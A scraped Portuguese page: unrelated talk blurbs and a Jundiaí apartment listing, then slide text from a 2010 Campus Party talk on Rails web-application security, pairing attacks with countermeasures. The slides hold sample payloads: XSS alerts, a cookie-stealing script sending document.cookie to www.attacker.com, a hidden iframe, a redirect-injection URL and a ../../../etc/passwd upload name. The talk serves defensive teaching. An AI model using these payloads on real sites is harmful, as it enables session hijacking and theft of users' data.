Produtividade do Trabalhador do Conhecimento Desafios Oportunidades e Novas H...Jose Claudio Terra
Apresentação abordando os desafios e oportunidades encontrados pelo trabalhador do conhecimento no que tange a produtividade e as novas habilidades demandadas necessárias dentro deste cenário
www.terraforum.com.br
Design de Serviço que enfatiza a experiência do usuário nos aeroportos brasileiros, o relacionamento e fidelização com a marca apresentado na pós graduação em Design de Interação PUC-MG
O Analista de Negócio é responsável pelas práticas de Análise de Negócio nas organizações.
Ao buscar solução para os problemas/necessidades de negócio, ele se depara com diversas práticas, guias, padrões e frameworks, normas e etc...
A Gestão de Serviços de TI usa as práticas da ITIL para o melhorar a qualidade dos serviços de TI.O objetivo desta apresentação é demonstrar com o Analista de Negócio interage com as práticas da ITIL para gerar valor ao negócio.
Produtividade do Trabalhador do Conhecimento Desafios Oportunidades e Novas H...Jose Claudio Terra
Apresentação abordando os desafios e oportunidades encontrados pelo trabalhador do conhecimento no que tange a produtividade e as novas habilidades demandadas necessárias dentro deste cenário
www.terraforum.com.br
Design de Serviço que enfatiza a experiência do usuário nos aeroportos brasileiros, o relacionamento e fidelização com a marca apresentado na pós graduação em Design de Interação PUC-MG
O Analista de Negócio é responsável pelas práticas de Análise de Negócio nas organizações.
Ao buscar solução para os problemas/necessidades de negócio, ele se depara com diversas práticas, guias, padrões e frameworks, normas e etc...
A Gestão de Serviços de TI usa as práticas da ITIL para o melhorar a qualidade dos serviços de TI.O objetivo desta apresentação é demonstrar com o Analista de Negócio interage com as práticas da ITIL para gerar valor ao negócio.
Apartamento em Jundiaí - Art'e Residence
Aqui a elegância ganha forma. Bem-vindo à nova referência de alto padrão e lazer na cidade.
4 e 3 suítes - 216 e 163 m² privativos
Ficha Técnica do Art'e Residence:
Apartamentos 4 ou 3 suítes com 216 e 163 m² privativos, ao estilo neoclássico clean, localizados na Vila Arens, Jundiaí. Além disso, são 2 torres e 2 ou 3 vagas de garagem por apartamento.
Localização: Rua Moisés Abaid, 189 (ao lado do Mc Donald's da Vila Arens)
N° de torres: 2
N° de apartamentos por andar: Torre A: 2 unidades | Torres B: 4 unidades
N° de pavimentos: 27 tipo, térreo e 2 subsolos
Total de unidades: 162 apartamentos
Área do terreno: 8.485,92 m²
Diferenciais:
Para atender a variedade de expectativas e modelos familiares, o padrão condomínio-clube oferece opções de lazer para todas as faixas etárias e estilos de vida, facilitando a adaptação ao novo endereço e agradando a todos os clientes. No Arte Residence, você encontra diversão para toda a família: Piscina adulta, Piscina infantil, Solarium, Quadra de tênis, Quadra poliesportiva, Fitness, Mini golf, Brinquedoteca, Salão do jogos, Salão de jogos juvenil, Salão de festas adulto, Espaço gourmet, Churrasqueira, Pet place e Praças
O bairro Vila Arens - Jundiaí
Jundiaí compõe a região metropolitana da cidade de São Paulo, está localizada a 60 km de SP e a 40 km de Campinas. Tem acesso rápido a São Paulo através das rodovidas Bandeirantes e Anhanguera, fica próxima às rodovias Castelo Branco, Dom Pedro I e ao Rodoanel.
Com atmosfera acolhedora e muito tranquila, a Vila Arens é um dos endereços mais privilegiados de Jundiaí. Sua localização central facilita o acesso a todos os pontos da cidade, e o bairro possui infraestrutura completa. Além disso, a Vila Arens, fica próxima ao Colégio Dvino Salvador e à Igreja Nossa Senhora da Conceição, à estação da CPTM, colégios, faculdades, comercio, serviços e lazer.
O objetivo da palestra é valorizar o esforço dos programadores que criaram os jogos clássicos do Atari 2600. Uma apresentação básica da arquitetura (em particular das limitações de CPU/memória e do chip TIA), montagem e rodagem, em um emulador, de um pequeno experimento, demonstrando a complexidade envolvida na criação de um jogo completo.
Palestrante
Carlos Duarte do Nascimento
Matemático pelo IME/USP e Gerente de Produto no Apontador, faz "artesanato" de software há 20 anos, defendendo plataformas e conteúdo livres.
Uma palestra para explorar o Google App Engine (GAE), uma plataforma de desenvolvimento e hospedagem de aplicações web na nuvem. Aplicativos fáceis de criar, manter e escalar.
Palestrante: Carlos Duarte do Nascimento
Matemático pelo IME/USP e Gerente de Produto no Apontador, faz "artesanato" de software há 20 anos, defendendo plataformas e conteúdo livres.
Quem nunca perdeu um arquivo após deletar algo por engano na máquina fotográfica, computador ou celular? Ou ainda, quem nunca formatou um pendrive ou partição de disco sem querer? Veja como utilizar técnicas de Forense Computacional para recuperar arquivos apagados. Recuperações a partir de dados ainda existentes na memória RAM e demonstrações ao vivo.
Palestrante: João Eriberto Mota Filho
Oficial de Cavalaria do Exército Brasileiro. Gerente de Rede e de Segurança em Rede do Gabinete do Comandante do Exército. Coordenador e professor da pós-graduação em Software Livre na Universidade Católica de Brasília (UCB) e professor da pós-graduação em Perícia Digital (UCB). Autor dos livros Linux & Seus Servidores (2000), Pequenas Redes com Microsoft Windows (2001) e Descobrindo o Linux (2ª edição em 2007).
Com tantas app stores, fabricantes e sistemas operacionais diferentes, em qual deles devemos apostar? Esta provavelmente é a sua maior dúvida se você está pensando em lançar uma start-up, criar jogos ou apps para seus serviços web no mundo mobile. Saiba onde investir e os porquês de cada plataforma. Conheça diferentes SDK cross-platform, apostas em Mobile Web app ou Nativo App.
Palestrante: Igor Costa
Tem 12 anos de experiência no mercado de software. É co-fundador da RIACycle, empresa brasileira dedicada a criar apps para web/mobile e a ensinar uma vasta rede de desenvolvedores. Palestrante assíduo, já particiou de vários eventos como o iMasters Intercon, Campus Party, Just Java, Flash Camp Brasil, Flex for Kids, Flex Mania, Flash Open Source Conference, faculdades, etc.
Fazendo do jeito certo: criando jogos sofisticados com DirectXCampus Party Brasil
Tecnologias vêm e vão, mas apenas uma permanece ao longo do tempo: o DirectX. Com o novo Windows 8 à vista, não poderia ser diferente e, nesta palestra, iremos explorar esta tecnologia, suas características e recursos, principalmente sob os novos aspectos necessários para a criação de jogos para Windows 8 e a interface Metro.
Palestrante: José Antonio Leal de Farias
CEO da Stairs Game Studio, professor, bacharel em Ciências da Computação pela UFCG, XNA/Directx Microsoft Most Valuable Professional, autor de livros e artigos publicados no Brasil e nos Estados Unidos e programador profissional há mais de uma década.
Você usou o Windows a vida inteira? Confuso com todas as terminologias usadas com software livre? Você gostaria de aprender, mas não sabe por onde começar? Maddog abordará os aspectos do software livre com a exploração de algumas aplicações disponíveis. Ele irá mostrar-lhe como fazer uma distribuição fora da rede em um CD ,ou em um pen drive de tamanho adequado, que você pode carregar no seu computador sem danificar o seu sistema Windows.
Palestrante: Jon Maddog
Atualmente, Maddog é diretor executivo da Linux International, uma organização sem fins lucrativos dedicada quase que exclusivamente à promoção de aplicações em código aberto. Figura carismática e de extrema importância para o software livre, é autor de vários artigos e apresentações, além de ter lançado um livro sobre a plataforma Linux, o “Linux for Dummies”. Ele também escreve para a editora Linux New Media, que traduz a revista Linux Pro e a exporta para mais de 100 países.
Gestão e monitoramento de redes e dispositivos com Software LivreCampus Party Brasil
Proatividade, baixo custo, interface amigável. Estes são apenas alguns dos benefícios que as soluções de gestão e monitoramento de redes e dispositivos com Software Livre podem trazer à sua empresa ou projeto. Participe dessa palestra e saiba mais, esclareça dúvidas e aproveite.
Palestrante: Rafael Gomes
Formado pela Universidade de Salvador em Gestão de Redes, atuou na UFBA como analista responsável pela segurança do Centro de Processamento de Dados. Hoje trabalha na Solutis Tecnologia LTDA, empresa responsável por prover soluções em código aberto. Atualmente está cursando a pós-graduação de Sistemas Distribuídos na UFBA e possui os certificados LPIC-1 (Linux Professional Institute Certification) e MCSO (Modulo Certified Security Officer).
Ideias e ferramentas para publicar conteúdo de forma relevante aproveitando os recursos das redes sociais tendo como base o caso do site Vida de Programador.
Palestrante: André Noel
Bacharel em Ciência da Computação pela Universidade Estadual de Maringá é desenvolvedor web desde 2002, mesmo ano em que aderiu ao Linux. Atualmente é membro do Conselho da Comunidade Ubuntu-BR e autor do site Vida de Programador.
8. Curi.ba,
PR
Joinville,
SC
quinta-feira, 28 de janeiro de 2010
9. São
Paulo,
SP
Curi.ba,
PR
Joinville,
SC
quinta-feira, 28 de janeiro de 2010
10. Benguela,
Angola
São
Paulo,
SP
Curi.ba,
PR
Joinville,
SC
quinta-feira, 28 de janeiro de 2010
11. ra
ut
ss
o
az
iro
od
dr
du
la
ov
el
an
te
zo
dr
ha
d
n
on
ca
ev
an
rri
za
ac
fra
jm
ed
ev
ga
gil
m
@
@
@
@
@
@
@
@p @r @j @p @m @a
at ob ack ita sp i ne
ric ert so n gor aze lize
kes oe rov asg
pa sp i ina g ra
ke nh
a
quinta-feira, 28 de janeiro de 2010
13. Sessões
• HTTP é um protocolo stateless
• Sessão é identificada por um cookie
(contendo uma identificação e um hash)
• Enviado do servidor para o cliente, e do
cliente para o servidor
quinta-feira, 28 de janeiro de 2010
16. Roubo de Sessão
• Roubo de um arquivo de cookie por um
“atacante”
• Permite que o atacante aja em nome da vítima
quinta-feira, 28 de janeiro de 2010
17. Como uma sessão pode ser
roubada?
Roubo Como combater?
quinta-feira, 28 de janeiro de 2010
18. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede
quinta-feira, 28 de janeiro de 2010
19. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
quinta-feira, 28 de janeiro de 2010
20. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
Utilizar computadores
“públicos”
quinta-feira, 28 de janeiro de 2010
21. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
Utilizar computadores Botão “logout”,
“públicos” expirar sessão
quinta-feira, 28 de janeiro de 2010
22. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
Utilizar computadores Botão “logout”,
“públicos” expirar sessão
Session Fixation
quinta-feira, 28 de janeiro de 2010
23. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
Utilizar computadores Botão “logout”,
“públicos” expirar sessão
Session Fixation (mais adiante)
quinta-feira, 28 de janeiro de 2010
24. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
Utilizar computadores Botão “logout”,
“públicos” expirar sessão
Session Fixation (mais adiante)
XSS
quinta-feira, 28 de janeiro de 2010
25. Como uma sessão pode ser
roubada?
Roubo Como combater?
Sniffers em uma rede SSL (https)
Utilizar computadores Botão “logout”,
“públicos” expirar sessão
Session Fixation (mais adiante)
XSS (mais adiante)
quinta-feira, 28 de janeiro de 2010
26. Dica:
Nunca armazene objetos
grandes em uma sessão.
quinta-feira, 28 de janeiro de 2010
27. Dica:
Nunca armazene
informações críticas
em uma sessão.
quinta-feira, 28 de janeiro de 2010
28. Como uma sessão é
armazenada?
quinta-feira, 28 de janeiro de 2010
29. Como uma sessão é
armazenada?
• ActiveRecordStore: armazena no
banco de dados (tabela “sessions”)
• CookieStore: armazena em um cookie
do usuário
quinta-feira, 28 de janeiro de 2010
31. Replay Attack no
CookieStore
quinta-feira, 28 de janeiro de 2010
32. Replay Attack no
CookieStore
1. Usuário ativa um cupom de presente na sua loja
online, ficando com R$50 de crédito (armazenado
na sessão)
quinta-feira, 28 de janeiro de 2010
33. Replay Attack no
CookieStore
1. Usuário ativa um cupom de presente na sua loja
online, ficando com R$50 de crédito (armazenado
na sessão)
2. Usuário compra algo custando R$40
quinta-feira, 28 de janeiro de 2010
34. Replay Attack no
CookieStore
1. Usuário ativa um cupom de presente na sua loja
online, ficando com R$50 de crédito (armazenado
na sessão)
2. Usuário compra algo custando R$40
3. Sessão agora armazena que usuário tem R$10
quinta-feira, 28 de janeiro de 2010
35. Replay Attack no
CookieStore
1. Usuário ativa um cupom de presente na sua loja
online, ficando com R$50 de crédito (armazenado
na sessão)
2. Usuário compra algo custando R$40
3. Sessão agora armazena que usuário tem R$10
4. Usuário sobreescreve a sessão atual pela sessão
inicial, ficando com R$50 novamente
quinta-feira, 28 de janeiro de 2010
39. Como combater
Session Fixation?
Utilize reset_session ao realizar login e/ou
armazenar algo do usuário (como IP ou
navegador).
quinta-feira, 28 de janeiro de 2010
41. Expirando sessões
• Expire-as de tempo em tempo (com base
no updated_at e no created_at)
• Um simples rake no crontab já resolve
quinta-feira, 28 de janeiro de 2010
43. CSRF
• Cross-Site Request Forgery
• Trata-se de aproveitar da sessão de um
usuário, forçando-o (muitas vezes sem
saber) a realizar determinada ação
quinta-feira, 28 de janeiro de 2010
45. Como combater CSRF?
Utilize os métodos HTTP da maneira correta
(GET e POST, obrigatoriamente; e PUT e
DELETE se possível)
quinta-feira, 28 de janeiro de 2010
48. Como combater CSRF?
• Utilize os métodos HTTP da maneira
correta (GET e POST, obrigatoriamente; e
PUT e DELETE se possível)
• Utilize um token
quinta-feira, 28 de janeiro de 2010
49. Como combater CSRF?
• Utilize os métodos HTTP da maneira
correta (GET e POST, obrigatoriamente; e
PUT e DELETE se possível)
• Utilize um token
quinta-feira, 28 de janeiro de 2010
50. Injeção em
Redirecionamentos
quinta-feira, 28 de janeiro de 2010
51. Injeção em
Redirecionamentos
http://www.example.com/site/legacy?
param1=xy¶m2=23&
host=www.attacker.com
quinta-feira, 28 de janeiro de 2010
52. Como combater injeções
em Redirecionamentos?
Não aceite URLs (ou partes dela)
como parâmetro.
quinta-feira, 28 de janeiro de 2010
54. Uploads de arquivos
• Algumas (várias?) aplicações aceitam
uploads, recebendo um arquivo e um nome
de arquivo.
• Se você armazena os arquivos em /var/
www/uploads, imagine se alguém fizer
upload de um arquivo chamado
../../../etc/passwd ?
quinta-feira, 28 de janeiro de 2010
55. Como combater uploads
maliciosos?
Evite receber o nome do arquivo, ou crie um
filtro com expressão regular.
quinta-feira, 28 de janeiro de 2010
57. DoS por uploads
• Se seu site processa arquivos (como
imagens, gerando miniaturas), nunca faça-o
sincronamente.
• Imagine alguém enviando milhares de
arquivos ao mesmo tempo?
quinta-feira, 28 de janeiro de 2010
58. Como combater DoS
por uploads?
Processe arquivos assincronamente (em um
daemon ou em um cron); se possível, até em
uma máquina separada.
quinta-feira, 28 de janeiro de 2010
60. Upload de executáveis
• Você terá problemas se armazenar seus
arquivos em algum local "autorizado" a
executar executáveis (como .CGI no
Apache Document Directory do seu Virtual
Host)
quinta-feira, 28 de janeiro de 2010
61. Como combater DoS
por uploads?
Simplesmente tenha certeza que seu servidor
web não está executando arquivos naquele
diretório.
quinta-feira, 28 de janeiro de 2010
62. Downloads não
autorizados
quinta-feira, 28 de janeiro de 2010
63. Downloads não
autorizados
• Evite que os usuários "escolham" o que
querem baixar, como em:
quinta-feira, 28 de janeiro de 2010
64. Downloads não
autorizados
• Evite que os usuários "escolham" o que
querem baixar, como em:
quinta-feira, 28 de janeiro de 2010
66. Como combater downloads
não autorizados?
Opcionalmente, armazene o nome do
arquivo no banco de dados, identificando-
o para o usuário através de um id.
quinta-feira, 28 de janeiro de 2010
68. Mass Assignment
• Você sabia que o "script/generate scaffold"
não gera o código mais completo e seguro
do mundo? :)
quinta-feira, 28 de janeiro de 2010
73. Força bruta no
login do usuário
quinta-feira, 28 de janeiro de 2010
74. Como combater ataque
de força bruta?
CAPTCH depois de determinadas tentativas
falhas de login.
Utilize uma mensagem de erro genérica, como
“usuário OU senha inválido, tente novamente”.
quinta-feira, 28 de janeiro de 2010
76. Hijacks diversos
• Senhas: requira que o usuário digite a antiga
senha para conseguir mudar.
quinta-feira, 28 de janeiro de 2010
77. Hijacks diversos
• Senhas: requira que o usuário digite a antiga
senha para conseguir mudar.
• Email: requira que o usuário digite a antiga
senha para conseguir mudar
quinta-feira, 28 de janeiro de 2010
78. Hijacks diversos
• Senhas: requira que o usuário digite a antiga
senha para conseguir mudar.
• Email: requira que o usuário digite a antiga
senha para conseguir mudar
• Outros: lembra do “problema” do GMail?
quinta-feira, 28 de janeiro de 2010
92. Whitelist rula!
• before_filter :only => [...] ao invés de
before_filter :except => [...]
quinta-feira, 28 de janeiro de 2010
93. Whitelist rula!
• before_filter :only => [...] ao invés de
before_filter :except => [...]
• attr_accessible ao invés de attr_protected
quinta-feira, 28 de janeiro de 2010
94. Whitelist rula!
• before_filter :only => [...] ao invés de
before_filter :except => [...]
• attr_accessible ao invés de attr_protected
• Permita somente <strong> ao invés de
remover <script>
quinta-feira, 28 de janeiro de 2010
101. XSS
• Cross Site Scripting
• Atualmente é o tipo de ataque mais comum,
segundo a Symantec Global Internet Security
Threat Report.
• Mais de 510.000 sites tiveram este tipo de
ataque só em abril de 2008.
• Diversas ferramentas para auxiliar estes
ataques, como o MPack.
quinta-feira, 28 de janeiro de 2010
103. XSS: Injeção JavaScript
<script>alert('Hello');</script>
<table background="javascript:alert('Hello')">
quinta-feira, 28 de janeiro de 2010
104. XSS: Roubo de Cookie
quinta-feira, 28 de janeiro de 2010
105. XSS: Roubo de Cookie
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://
www.attacker.com/' + document.cookie + '">');</script>
quinta-feira, 28 de janeiro de 2010
107. XSS: Defacement
<iframe name=”StatPage” src="http://58.xx.xxx.xxx"
width=5 height=5 style=”display:none”></iframe>
quinta-feira, 28 de janeiro de 2010
108. Como combater estes
ataques XSS?
Limpe a “entrada” do usuário com o método
sanatize.
quinta-feira, 28 de janeiro de 2010
109. Como combater estes
ataques XSS?
Limpe a “entrada” do usuário com o método
sanatize.
Limpe a “saída” (impressão) com escapeHTML
(), também chamado de h().
quinta-feira, 28 de janeiro de 2010
110. Como combater estes
ataques XSS?
Limpe a “entrada” do usuário com o método
sanatize.
Limpe a “saída” (impressão) com escapeHTML
(), também chamado de h().
<%=h @user.name %>
quinta-feira, 28 de janeiro de 2010
112. XSS: Injeção CSS
background:url('javascript:alert(1)')
quinta-feira, 28 de janeiro de 2010
113. Como combater estes
ataque XSS de injeção CSS?
Evite CSS personalizado.
quinta-feira, 28 de janeiro de 2010
114. Dicas sobre a interface
administrativa
quinta-feira, 28 de janeiro de 2010
115. Dicas sobre a interface
administrativa
• Coloque-a em um subdomínio distinto,
como admin.campusparty.com.br. Isso evita
truques com Cookies.
quinta-feira, 28 de janeiro de 2010
116. Dicas sobre a interface
administrativa
• Coloque-a em um subdomínio distinto,
como admin.campusparty.com.br. Isso evita
truques com Cookies.
• Se possível, limite o acesso administrativo a
um número restritos de IP (ou a uma faixa).
quinta-feira, 28 de janeiro de 2010
117. Dicas sobre a interface
administrativa
• Coloque-a em um subdomínio distinto,
como admin.campusparty.com.br. Isso evita
truques com Cookies.
• Se possível, limite o acesso administrativo a
um número restritos de IP (ou a uma faixa).
• Que tal uma senha especial para ações
importantes, como deletar usuários?
quinta-feira, 28 de janeiro de 2010